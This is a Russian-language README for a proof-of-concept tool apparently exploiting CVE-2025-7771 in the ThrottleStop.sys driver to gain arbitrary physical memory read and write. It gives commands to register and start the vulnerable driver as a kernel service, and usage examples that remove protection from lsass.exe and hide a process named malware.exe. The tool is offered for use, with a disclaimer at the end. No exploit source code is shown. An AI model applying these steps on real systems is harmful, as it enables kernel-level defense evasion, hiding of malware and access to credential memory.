
Простой PoC, демонстрирующий уязвимость в драйвере ThrottleStop.sys, показывающий возможности произвольного чтения и записи физической памяти, а также трансляцию виртуальных адресов в физические с помощью Superfetch.
Простой PoC, демонстрирующий уязвимость в драйвере ThrottleStop.sys, показывающий возможности произвольного чтения и записи физической памяти, а также трансляцию виртуальных адресов в физические с помощью Superfetch.
Запустите cmd.exe с правами администратора и зарегистрируйте службу драйвера ядра с типом 'kernel' и binPath, указывающим на расположение уязвимого драйвера.
> sc create ThrottleStop binPath= <path> type= kernel`
> sc start ThrottleStop
Команды:
--protect : Protect a process.
--unprotect : Unprotect a potected process.
--hide : Hide a process.
--unhide : Unhide a process.
--help : Print help
Примеры:
CVE-2025-7771.exe --protect notepad.exe или CVE-2025-7771exe --protect 12345
CVE-2025-7771.exe --unprotect lsass.exe или CVE-2025-7771.exe --unprotect 12345
CVE-2025-7771.exe --hide malware.exe или CVE-2025-7771.exe --hide 12345
Чтобы отобразить скрытый процесс, вы можете использовать команду --unhide с указанием адреса eprocess скрытого процесса через '--eprocess':
CVE-2025-7771.exe --unhide --eprocess 0xffffc207da1d9240
Вы несете ответственность за получение соответствующих разрешений перед использованием этого инструмента. Автор не несет ответственности за неправомерное использование.
Это текущий проект, приветствуются вклады и предложения! Если у вас есть идеи, улучшения или вы хотите сотрудничать, свяжитесь по адресу: [email protected]